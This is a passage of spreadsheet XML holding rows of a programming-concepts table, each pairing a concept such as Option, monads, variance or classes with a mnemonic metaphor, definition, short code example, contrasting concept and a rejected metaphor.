          <t>A ring box that might be empty: the box's very shape forces you to open it and look before proposing — you cannot slide an unopened box onto a finger.</t>
        </is>
      </c>
      <c r="E383" t="inlineStr">
        <is>
          <t>A container holding either one value (Some/Just) or nothing (None/Nothing), forcing callers to acknowledge absence in the type.</t>
        </is>
      </c>
      <c r="F383" t="inlineStr">
        <is>
          <t>def find(uid) -&gt; Optional[User]: ... / u = find(7) / if u is not None: greet(u)</t>
        </is>
      </c>
      <c r="G383" t="inlineStr">
        <is>
          <t>null — an unmarked landmine any reference may hide; Option marks possible absence in the type and demands unwrapping.</t>
        </is>
      </c>
      <c r="H383" t="inlineStr">
        <is>
          <t>Schrodinger's cat (rejected: superposition misleads — it is one or the other, knowably).</t>
        </is>
      </c>
      <c r="J383" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K383" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" t="n">
        <v>0</v>
      </c>
      <c r="B384" t="inlineStr">
        <is>
          <t>382</t>
        </is>
      </c>
      <c r="C384" t="inlineStr">
        <is>
          <t>Result / Either</t>
        </is>
      </c>
      <c r="D384" t="inlineStr">
        <is>
          <t>An exam envelope containing either a diploma or a red-inked page listing exactly which questions you failed — never both, never empty.</t>
        </is>
      </c>
      <c r="E384" t="inlineStr">
        <is>
          <t>A container holding success (Ok/Right) or failure with a reason (Err/Left) — like Option, but the empty case carries an explanation.</t>
        </is>
      </c>
      <c r="F384" t="inlineStr">
        <is>
          <t>fn parse(s: &amp;str) -&gt; Result&lt;i32, ParseError&gt; / match parse(x) { Ok(n) =&gt; use_it(n), Err(e) =&gt; log(e) }</t>
        </is>
      </c>
      <c r="G384" t="inlineStr">
        <is>
          <t>Option — models absence with no reason attached; Result's failure branch carries the error details.</t>
        </is>
      </c>
      <c r="H384" t="inlineStr">
        <is>
          <t>Two-door game show (rejected: chance connotation; the outcome is determined).</t>
        </is>
      </c>
      <c r="J384" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K384" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" t="n">
        <v>0</v>
      </c>
      <c r="B385" t="inlineStr">
        <is>
          <t>383</t>
        </is>
      </c>
      <c r="C385" t="inlineStr">
        <is>
          <t>map on containers</t>
        </is>
      </c>
      <c r="D385" t="inlineStr">
        <is>
          <t>A lab glovebox: your bare hands work on whatever sits inside through sealed rubber gloves — and if the chamber is empty, your hands just wave in the void, no harm done.</t>
        </is>
      </c>
      <c r="E385" t="inlineStr">
        <is>
          <t>Apply a plain function inside the container without opening it: Some(2).map(sq) is Some(4); None and Err pass through untouched.</t>
        </is>
      </c>
      <c r="F385" t="inlineStr">
        <is>
          <t>found.map(lambda u: u.email) # Option stays Option / Ok(2).map(sq) # Ok(4) / Err(e).map(sq) # Err(e), untouched</t>
        </is>
      </c>
      <c r="G385" t="inlineStr">
        <is>
          <t>flatMap — for functions that themselves return a container; plain map would double-wrap their result.</t>
        </is>
      </c>
      <c r="H385" t="inlineStr">
        <is>
          <t>Massaging through a blanket (rejected: cozy but imprecise).</t>
        </is>
      </c>
      <c r="J385" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K385" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" t="n">
        <v>0</v>
      </c>
      <c r="B386" t="inlineStr">
        <is>
          <t>384</t>
        </is>
      </c>
      <c r="C386" t="inlineStr">
        <is>
          <t>flatMap / bind</t>
        </is>
      </c>
      <c r="D386" t="inlineStr">
        <is>
          <t>The matryoshka customs desk: each checkpoint tries to slip your doll inside another doll, but the officer instantly cracks the outer shell so you always walk on carrying exactly one doll.</t>
        </is>
      </c>
      <c r="E386" t="inlineStr">
        <is>
          <t>Chain a container-returning function without nesting: flatMap flattens one layer so Option-of-Option never forms; also called bind or and_then.</t>
        </is>
      </c>
      <c r="F386" t="inlineStr">
        <is>
          <t>user.flatMap(get_cart).flatMap(checkout) / # with plain map: Some(Some(Some(...))) nesting</t>
        </is>
      </c>
      <c r="G386" t="inlineStr">
        <is>
          <t>map — lifts a plain-value function; reach for flatMap when the function returns Some/Ok itself.</t>
        </is>
      </c>
      <c r="H386" t="inlineStr">
        <is>
          <t>Pancake flattener (rejected: 'flat' pun without the chaining half).</t>
        </is>
      </c>
      <c r="J386" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K386" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" t="n">
        <v>0</v>
      </c>
      <c r="B387" t="inlineStr">
        <is>
          <t>385</t>
        </is>
      </c>
      <c r="C387" t="inlineStr">
        <is>
          <t>Functor</t>
        </is>
      </c>
      <c r="D387" t="inlineStr">
        <is>
          <t>A FUN-house mirror hall: whoever walks through gets transformed head to toe, but the hall itself — doors, length, lighting — never changes shape.</t>
        </is>
      </c>
      <c r="E387" t="inlineStr">
        <is>
          <t>Any context you can map over while preserving its structure — lists, Option, Result, promises — obeying identity and composition laws.</t>
        </is>
      </c>
      <c r="F387" t="inlineStr">
        <is>
          <t>[1, 2, 3] mapped with sq -&gt; [1, 4, 9] # same length / Some(2) mapped with sq -&gt; Some(4) # same shape</t>
        </is>
      </c>
      <c r="G387" t="inlineStr">
        <is>
          <t>Monad — a functor that also has flatten/bind for chaining; every monad is a functor, not vice versa.</t>
        </is>
      </c>
      <c r="H387" t="inlineStr">
        <is>
          <t>A 'fun tractor' plowing fields evenly (rejected: sound gag, structure not encoded).</t>
        </is>
      </c>
      <c r="J387" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K387" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" t="n">
        <v>0</v>
      </c>
      <c r="B388" t="inlineStr">
        <is>
          <t>386</t>
        </is>
      </c>
      <c r="C388" t="inlineStr">
        <is>
          <t>Applicative</t>
        </is>
      </c>
      <c r="D388" t="inlineStr">
        <is>
          <t>Two sealed test tubes clicked into a mixing machine — one holds a chemical, the other a recipe slip — and the machine combines them without ever unsealing either tube on the bench.</t>
        </is>
      </c>
      <c r="E388" t="inlineStr">
        <is>
          <t>A functor that can also wrap plain values (pure) and apply a wrapped function to a wrapped value, combining independent contexts.</t>
        </is>
      </c>
      <c r="F388" t="inlineStr">
        <is>
          <t>-- Haskell validation / User &lt;$&gt; okName &lt;*&gt; okAge / -- both checked; failures can accumulate</t>
        </is>
      </c>
      <c r="G388" t="inlineStr">
        <is>
          <t>Monad — sequences dependent steps where the next needs the previous result; applicative combines independent ones.</t>
        </is>
      </c>
      <c r="H388" t="inlineStr">
        <is>
          <t>'Apply-cative' job applications merged (rejected: word-salad pun).</t>
        </is>
      </c>
      <c r="J388" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K388" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" t="n">
        <v>0</v>
      </c>
      <c r="B389" t="inlineStr">
        <is>
          <t>387</t>
        </is>
      </c>
      <c r="C389" t="inlineStr">
        <is>
          <t>Monad</t>
        </is>
      </c>
      <c r="D389" t="inlineStr">
        <is>
          <t>A subway line where every station might eject you: one swipe (bind) carries you station to station, and if any gate slams you leave the whole line — the track itself handles the plumbing between stops.</t>
        </is>
      </c>
      <c r="E389" t="inlineStr">
        <is>
          <t>A context with wrap (unit) and chain (bind), letting context-returning steps sequence cleanly — a programmable semicolon.</t>
        </is>
      </c>
      <c r="F389" t="inlineStr">
        <is>
          <t>Some(u).flatMap(cart).flatMap(pay).flatMap(receipt) / # any None short-circuits the whole chain</t>
        </is>
      </c>
      <c r="G389" t="inlineStr">
        <is>
          <t>Functor/applicative — weaker powers; only a monad lets one step's output decide the next step's context.</t>
        </is>
      </c>
      <c r="H389" t="inlineStr">
        <is>
          <t>Burrito (rejected: the community's own cautionary example of anchors that explain nothing).</t>
        </is>
      </c>
      <c r="J389" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K389" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" t="n">
        <v>0</v>
      </c>
      <c r="B390" t="inlineStr">
        <is>
          <t>388</t>
        </is>
      </c>
      <c r="C390" t="inlineStr">
        <is>
          <t>Railway-oriented programming</t>
        </is>
      </c>
      <c r="D390" t="inlineStr">
        <is>
          <t>A model train on twin rails: the green rail runs through every station's machinery; at the first jam a switch shunts the train onto the red rail, which glides past all remaining stations straight to the report desk.</t>
        </is>
      </c>
      <c r="E390" t="inlineStr">
        <is>
          <t>Model a workflow as a two-track railway: data speeds down the success track and any failure switches it to a parallel error track that bypasses the rest.</t>
        </is>
      </c>
      <c r="F390" t="inlineStr">
        <is>
          <t>result = (validate(inp) / .and_then(save) / .and_then(notify)) # an Err skips ahead</t>
        </is>
      </c>
      <c r="G390" t="inlineStr">
        <is>
          <t>try/except around everything — one catch-all jump; ROP threads the failure through typed returns step by step.</t>
        </is>
      </c>
      <c r="H390" t="inlineStr">
        <is>
          <t>Highway breakdown lane (rejected: cars rejoin traffic; errors do not).</t>
        </is>
      </c>
      <c r="J390" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K390" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" t="n">
        <v>0</v>
      </c>
      <c r="B391" t="inlineStr">
        <is>
          <t>389</t>
        </is>
      </c>
      <c r="C391" t="inlineStr">
        <is>
          <t>Unwrap and defaults</t>
        </is>
      </c>
      <c r="D391" t="inlineStr">
        <is>
          <t>Opening the maybe-empty ring box at the altar: unwrap_or slips a backup candy ring from your pocket; bare unwrap faints in front of everyone if the box is empty.</t>
        </is>
      </c>
      <c r="E391" t="inlineStr">
        <is>
          <t>Boundary escape hatches: getOrElse/unwrap_or supply a fallback value, while bare unwrap asserts success and crashes on the empty case.</t>
        </is>
      </c>
      <c r="F391" t="inlineStr">
        <is>
          <t>port = cfg_port.unwrap_or(8080) / val = opt.unwrap() # panics if None / x = d.get('k', 0) # dict default</t>
        </is>
      </c>
      <c r="G391" t="inlineStr">
        <is>
          <t>flatMap chaining — stays inside the container's safety; unwrap ends it and returns to plain values.</t>
        </is>
      </c>
      <c r="H391" t="inlineStr">
        <is>
          <t>Airbag deployment (rejected: implies unwrap is the safe part; it is the crash).</t>
        </is>
      </c>
      <c r="J391" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K391" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" t="n">
        <v>0</v>
      </c>
      <c r="B392" t="inlineStr">
        <is>
          <t>390</t>
        </is>
      </c>
      <c r="C392" t="inlineStr">
        <is>
          <t>Static vs dynamic typing</t>
        </is>
      </c>
      <c r="D392" t="inlineStr">
        <is>
          <t>Two airlines: Static Air x-rays every bag at check-in so bad bags never board; Dynamic Air opens bags mid-flight, and some explode over the ocean.</t>
        </is>
      </c>
      <c r="E392" t="inlineStr">
        <is>
          <t>Static: types checked before the program runs, via annotations or inference; dynamic: values carry types and checks happen mid-run.</t>
        </is>
      </c>
      <c r="F392" t="inlineStr">
        <is>
          <t>let n: number = 'hi' // TS: compile error / n = 'hi'; n + 5 # Python: TypeError at runtime</t>
        </is>
      </c>
      <c r="G392" t="inlineStr">
        <is>
          <t>Strong vs weak — how strictly types coerce, an independent axis; Python is dynamic AND strong.</t>
        </is>
      </c>
      <c r="H392" t="inlineStr">
        <is>
          <t>Forecast vs live radar (rejected: both are predictions, muddles it).</t>
        </is>
      </c>
      <c r="J392" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K392" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" t="n">
        <v>0</v>
      </c>
      <c r="B393" t="inlineStr">
        <is>
          <t>391</t>
        </is>
      </c>
      <c r="C393" t="inlineStr">
        <is>
          <t>Strong vs weak typing</t>
        </is>
      </c>
      <c r="D393" t="inlineStr">
        <is>
          <t>Two blenders: the strong one jams and beeps when a fork falls into the smoothie; the weak one cheerfully liquefies the fork and serves it to you.</t>
        </is>
      </c>
      <c r="E393" t="inlineStr">
        <is>
          <t>Strong: operations on mismatched types fail loudly; weak: the language silently coerces — '5' + 3 errors in Python, yields '53' in JS.</t>
        </is>
      </c>
      <c r="F393" t="inlineStr">
        <is>
          <t>'5' + 3 # Python: TypeError (strong) / '5' + 3 // JS: '53' (weak coercion)</t>
        </is>
      </c>
      <c r="G393" t="inlineStr">
        <is>
          <t>Static vs dynamic — when checks happen; strong/weak is how strict conversions are. JS is dynamic AND weak.</t>
        </is>
      </c>
      <c r="H393" t="inlineStr">
        <is>
          <t>Strongman contest (rejected: strength pun with no coercion).</t>
        </is>
      </c>
      <c r="J393" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K393" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" t="n">
        <v>0</v>
      </c>
      <c r="B394" t="inlineStr">
        <is>
          <t>392</t>
        </is>
      </c>
      <c r="C394" t="inlineStr">
        <is>
          <t>Type inference</t>
        </is>
      </c>
      <c r="D394" t="inlineStr">
        <is>
          <t>A tiny Sherlock living in your margins: from a single ash flake — the literal 5 — he writes 'integer' in his notebook and shadows that variable through the whole file, deducing every step.</t>
        </is>
      </c>
      <c r="E394" t="inlineStr">
        <is>
          <t>The compiler deduces types from usage so you get full static safety without writing annotations — let n = 5 is known to be an int.</t>
        </is>
      </c>
      <c r="F394" t="inlineStr">
        <is>
          <t>let xs = vec![1, 2, 3]; // Rust infers Vec&lt;i32&gt; / val s = "hi" // Kotlin infers String</t>
        </is>
      </c>
      <c r="G394" t="inlineStr">
        <is>
          <t>Dynamic typing — no compile-time types at all; inference is static typing, just written for you.</t>
        </is>
      </c>
      <c r="H394" t="inlineStr">
        <is>
          <t>IDE autocomplete (rejected: an editor feature, not the compiler's proof).</t>
        </is>
      </c>
      <c r="J394" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K394" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" t="n">
        <v>0</v>
      </c>
      <c r="B395" t="inlineStr">
        <is>
          <t>393</t>
        </is>
      </c>
      <c r="C395" t="inlineStr">
        <is>
          <t>Generics</t>
        </is>
      </c>
      <c r="D395" t="inlineStr">
        <is>
          <t>A cookie cutter stamped &lt;T&gt; forged from memory-metal: press it into dough, clay, or snow and it becomes a dough-cutter, clay-cutter, snow-cutter — never mixing crumbs between them.</t>
        </is>
      </c>
      <c r="E395" t="inlineStr">
        <is>
          <t>Write code once over a type parameter T and use it at many concrete types with full type safety — parametric polymorphism.</t>
        </is>
      </c>
      <c r="F395" t="inlineStr">
        <is>
          <t>def first(xs: list[T]) -&gt; T: return xs[0] / Box&lt;int&gt; and Box&lt;str&gt; share one Box&lt;T&gt; code</t>
        </is>
      </c>
      <c r="G395" t="inlineStr">
        <is>
          <t>Any/object — also fits everything but erases type info; generics preserve the link between input and output types.</t>
        </is>
      </c>
      <c r="H395" t="inlineStr">
        <is>
          <t>One-size-fits-all cap (rejected: 'fits all' loses per-use specialization).</t>
        </is>
      </c>
      <c r="J395" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K395" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" t="n">
        <v>0</v>
      </c>
      <c r="B396" t="inlineStr">
        <is>
          <t>394</t>
        </is>
      </c>
      <c r="C396" t="inlineStr">
        <is>
          <t>Duck typing</t>
        </is>
      </c>
      <c r="D396" t="inlineStr">
        <is>
          <t>A duck-call contest judged blindfolded: a robot, a comedian, and an actual duck all advance, because the judge only ever listens for the quack().</t>
        </is>
      </c>
      <c r="E396" t="inlineStr">
        <is>
          <t>Dynamic-language polymorphism: any object with the right methods works, checked only at the call — if it quacks, it's a duck.</t>
        </is>
      </c>
      <c r="F396" t="inlineStr">
        <is>
          <t>def feed(a): a.quack() / feed(Duck()); feed(RobotDuck()) # both fine / feed(Cat()) # AttributeError at runtime</t>
        </is>
      </c>
      <c r="G396" t="inlineStr">
        <is>
          <t>Structural typing — the same shape-based idea verified statically at compile time; duck typing fails at runtime.</t>
        </is>
      </c>
      <c r="H396" t="inlineStr">
        <is>
          <t>Rubber duck debugging (rejected: entirely different duck).</t>
        </is>
      </c>
      <c r="J396" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K396" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" t="n">
        <v>0</v>
      </c>
      <c r="B397" t="inlineStr">
        <is>
          <t>395</t>
        </is>
      </c>
      <c r="C397" t="inlineStr">
        <is>
          <t>Structural typing</t>
        </is>
      </c>
      <c r="D397" t="inlineStr">
        <is>
          <t>A locksmith checks keys by holding them against a traced silhouette: any key with the same teeth opens the door — nobody asks which factory forged it.</t>
        </is>
      </c>
      <c r="E397" t="inlineStr">
        <is>
          <t>Compatibility by shape: a value satisfies a type if it has the required members, no declaration needed — checked statically (TypeScript, Go).</t>
        </is>
      </c>
      <c r="F397" t="inlineStr">
        <is>
          <t>interface Named { name: string } / const p = { name: 'Ann', age: 3 } / greet(p) // TS: OK, the shape fits</t>
        </is>
      </c>
      <c r="G397" t="inlineStr">
        <is>
          <t>Nominal typing — requires the declared name or lineage; structural inspects only members. Duck typing is its runtime cousin.</t>
        </is>
      </c>
      <c r="H397" t="inlineStr">
        <is>
          <t>Tetris piece fitting (rejected: taken by every API-compatibility metaphor).</t>
        </is>
      </c>
      <c r="J397" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K397" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" t="n">
        <v>0</v>
      </c>
      <c r="B398" t="inlineStr">
        <is>
          <t>396</t>
        </is>
      </c>
      <c r="C398" t="inlineStr">
        <is>
          <t>Nominal typing</t>
        </is>
      </c>
      <c r="D398" t="inlineStr">
        <is>
          <t>A pedigree dog show: your mutt may look identical to the champion poodle, but no papers, no entry — the judge reads bloodline certificates, never fur.</t>
        </is>
      </c>
      <c r="E398" t="inlineStr">
        <is>
          <t>Compatibility by declared name and lineage: identically shaped types stay distinct unless one explicitly declares the relationship (Java, C#).</t>
        </is>
      </c>
      <c r="F398" t="inlineStr">
        <is>
          <t>class Meters { double v; } / class Feet { double v; } / // Java: not interchangeable despite same shape</t>
        </is>
      </c>
      <c r="G398" t="inlineStr">
        <is>
          <t>Structural typing — same shape means compatible; nominal demands the explicit name or inheritance link.</t>
        </is>
      </c>
      <c r="H398" t="inlineStr">
        <is>
          <t>Members-only club card (rejected: pedigree contrasts sharper with 395's silhouette).</t>
        </is>
      </c>
      <c r="J398" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K398" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" t="n">
        <v>0</v>
      </c>
      <c r="B399" t="inlineStr">
        <is>
          <t>397</t>
        </is>
      </c>
      <c r="C399" t="inlineStr">
        <is>
          <t>Variance</t>
        </is>
      </c>
      <c r="D399" t="inlineStr">
        <is>
          <t>A cat cafe with two chutes: the OUT chute hands you cats, so a cat-dispenser counts as an animal-dispenser (covariant); the IN chute takes food, where an any-animal feeder serves the cats fine — the arrow flips (contravariant).</t>
        </is>
      </c>
      <c r="E399" t="inlineStr">
        <is>
          <t>How subtyping flows through generics: covariant preserves direction (producers/outputs), contravariant flips it (consumers/inputs), invariant allows neither.</t>
        </is>
      </c>
      <c r="F399" t="inlineStr">
        <is>
          <t>Iterable[Cat] -&gt; Iterable[Animal] # covariant / Handler[Animal] -&gt; Handler[Cat] # contravariant / list[Cat] is NOT list[Animal] # invariant</t>
        </is>
      </c>
      <c r="G399" t="inlineStr">
        <is>
          <t>Plain subtyping — Cat vs Animal; variance asks whether Box[Cat] relates to Box[Animal] at all.</t>
        </is>
      </c>
      <c r="H399" t="inlineStr">
        <is>
          <t>Variance in statistics (rejected: same word, unrelated meaning — the exact trap to avoid).</t>
        </is>
      </c>
      <c r="J399" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K399" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" t="n">
        <v>0</v>
      </c>
      <c r="B400" t="inlineStr">
        <is>
          <t>398</t>
        </is>
      </c>
      <c r="C400" t="inlineStr">
        <is>
          <t>Gradual typing</t>
        </is>
      </c>
      <c r="D400" t="inlineStr">
        <is>
          <t>Renovating a dark house one room at a time: each rewired room gets bright inspection lighting while the rest stays candlelit but livable — you never have to move out.</t>
        </is>
      </c>
      <c r="E400" t="inlineStr">
        <is>
          <t>Mix dynamic and static code in one program, adding annotations incrementally; unannotated parts stay dynamic (TypeScript, Python + mypy).</t>
        </is>
      </c>
      <c r="F400" t="inlineStr">
        <is>
          <t>def area(r: float) -&gt; float: ... # checked / def legacy(x): ... # still dynamic, coexists</t>
        </is>
      </c>
      <c r="G400" t="inlineStr">
        <is>
          <t>Hints without a checker — decorative comments in effect; gradual typing actually enforces the annotated parts.</t>
        </is>
      </c>
      <c r="H400" t="inlineStr">
        <is>
          <t>Gradient paint fade (rejected: pretty, mechanism-free).</t>
        </is>
      </c>
      <c r="J400" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K400" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" t="n">
        <v>0</v>
      </c>
      <c r="B401" t="inlineStr">
        <is>
          <t>399</t>
        </is>
      </c>
      <c r="C401" t="inlineStr">
        <is>
          <t>Kinds of polymorphism</t>
        </is>
      </c>
      <c r="D401" t="inlineStr">
        <is>
          <t>Three actors each play 'the doctor' for one night: a mime who fits any script unchanged (parametric), a quick-change artist with a costume per audience (ad-hoc), and the understudy dynasty inheriting the role (subtype).</t>
        </is>
      </c>
      <c r="E401" t="inlineStr">
        <is>
          <t>One interface, many types, three routes: parametric (generics), ad-hoc (overloading/typeclasses), and subtype (inheritance/interfaces).</t>
        </is>
      </c>
      <c r="F401" t="inlineStr">
        <is>
          <t>first(xs) # parametric: works for any T / 1 + 1; 'a' + 'b' # ad-hoc: + overloaded per type / animal.speak() # subtype dispatch</t>
        </is>
      </c>
      <c r="G401" t="inlineStr">
        <is>
          <t>Overloading vs overriding — overloading is ad-hoc, resolved by argument types; overriding powers subtype dispatch.</t>
        </is>
      </c>
      <c r="H401" t="inlineStr">
        <is>
          <t>Poly the parrot with many voices (rejected: 'many' without the three distinct routes).</t>
        </is>
      </c>
      <c r="J401" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K401" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" t="n">
        <v>0</v>
      </c>
      <c r="B402" t="inlineStr">
        <is>
          <t>400</t>
        </is>
      </c>
      <c r="C402" t="inlineStr">
        <is>
          <t>Class</t>
        </is>
      </c>
      <c r="D402" t="inlineStr">
        <is>
          <t>An architect's blue-ink blueprint pinned to the site wall; from that one drawing, cranes stamp out identical houses all day long.</t>
        </is>
      </c>
      <c r="E402" t="inlineStr">
        <is>
          <t>A blueprint defining the fields and methods its instances will share; the template from which objects are stamped.</t>
        </is>
      </c>
      <c r="F402" t="inlineStr">
        <is>
          <t>class Dog: / def bark(self): return 'woof'</t>
        </is>
      </c>
      <c r="G402" t="inlineStr">
        <is>
          <t>Object/instance — the class is the design; the object is one concrete thing built from it.</t>
        </is>
      </c>
      <c r="H402" t="inlineStr">
        <is>
          <t>A cookie cutter pressing dough (rejected for the architecture flavor of blueprint).</t>
        </is>
      </c>
      <c r="J402" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K402" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" t="n">
        <v>0</v>
      </c>
      <c r="B403" t="inlineStr">
        <is>
          <t>401</t>
        </is>
      </c>
      <c r="C403" t="inlineStr">
        <is>
          <t>Object (instance)</t>
        </is>
      </c>
      <c r="D403" t="inlineStr">
        <is>
          <t>The house actually built from the blueprint: you can knock on THIS door, and its peeling green paint is its own private state.</t>
        </is>
      </c>
      <c r="E403" t="inlineStr">
        <is>
          <t>A concrete runtime value created from a class, holding its own state and responding to the class's methods.</t>
        </is>
      </c>
      <c r="F403" t="inlineStr">
        <is>
          <t>rex = Dog() / fido = Dog() / rex is fido # False - two objects</t>
        </is>
      </c>
      <c r="G403" t="inlineStr">
        <is>
          <t>Class — one class, many objects; only objects occupy memory with per-instance state.</t>
        </is>
      </c>
      <c r="H403" t="inlineStr">
        <is>
          <t>A fresh cookie with its own unique sprinkle pattern.</t>
        </is>
      </c>
      <c r="J403" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K403" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" t="n">
        <v>0</v>
      </c>
      <c r="B404" t="inlineStr">
        <is>
          <t>402</t>
        </is>
      </c>
      <c r="C404" t="inlineStr">
        <is>
          <t>Instantiation</t>
        </is>
      </c>
      <c r="D404" t="inlineStr">
        <is>
          <t>An INSTANT camera whirs and spits out a fresh print: press the shutter (new) and a brand-new photo slides out, chemicals developing before your eyes. Instant-iation.</t>
        </is>
      </c>
      <c r="E404" t="inlineStr">
        <is>
          <t>The act of creating a new object from a class: allocate memory, then run the constructor to initialize it.</t>
        </is>
      </c>
      <c r="F404" t="inlineStr">
        <is>
          <t>d = Dog() # Python / Dog d = new Dog(); // Java</t>
        </is>
      </c>
      <c r="G404" t="inlineStr">
        <is>
          <t>Initialization — instantiation allocates the object; initialization (constructor body) fills in its starting state.</t>
        </is>
      </c>
      <c r="H404" t="inlineStr">
        <is>
          <t>A vending machine dropping one can per coin.</t>
        </is>
      </c>
      <c r="J404" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K404" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" t="n">
        <v>0</v>
      </c>
      <c r="B405" t="inlineStr">
        <is>
          <t>403</t>
        </is>
      </c>
      <c r="C405" t="inlineStr">
        <is>
          <t>Fields (attributes)</t>
        </is>
      </c>
      <c r="D405" t="inlineStr">
        <is>
          <t>Every object is a little farm: its FIELDS are fenced plots, each gate labeled with a name and each plot growing exactly one value.</t>
        </is>
      </c>
      <c r="E405" t="inlineStr">
        <is>
          <t>Named variables stored inside each object that hold its state, persisting for the object's lifetime.</t>
        </is>
      </c>
      <c r="F405" t="inlineStr">
        <is>
          <t>self.name = 'Rex' / self.age = 3</t>
        </is>
      </c>
      <c r="G405" t="inlineStr">
        <is>
          <t>Local variables — fields live in the object and persist between calls; locals die when the method returns.</t>
        </is>
      </c>
      <c r="H405" t="inlineStr">
        <is>
          <t>Luggage tags dangling off one suitcase.</t>
        </is>
      </c>
      <c r="J405" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K405" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" t="n">
        <v>0</v>
      </c>
      <c r="B406" t="inlineStr">
        <is>
          <t>404</t>
        </is>
      </c>
      <c r="C406" t="inlineStr">
        <is>
          <t>Methods</t>
        </is>
      </c>
      <c r="D406" t="inlineStr">
        <is>
          <t>A METHOD actor who refuses to perform until handed his character sheet: give him the object (self) and he acts entirely out of its state.</t>
        </is>
      </c>
      <c r="E406" t="inlineStr">
        <is>
          <t>Functions attached to a class that operate on an object's state, invoked on an instance as obj.method().</t>
        </is>
      </c>
      <c r="F406" t="inlineStr">
        <is>
          <t>class Dog: / def speak(self): / return self.name + ' says woof'</t>
        </is>
      </c>
      <c r="G406" t="inlineStr">
        <is>
          <t>Free function — a method implicitly receives the instance (self/this) and can read its fields; a function stands alone.</t>
        </is>
      </c>
      <c r="H406" t="inlineStr">
        <is>
          <t>Buttons on the object's personal remote control.</t>
        </is>
      </c>
      <c r="J406" t="inlineStr">
        <is>
          <t>Object-oriented design</t>
        </is>
      </c>
      <c r="K406" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" t="n">
        <v>0</v>
      </c>
      <c r="B407" t="inlineStr">
        <is>
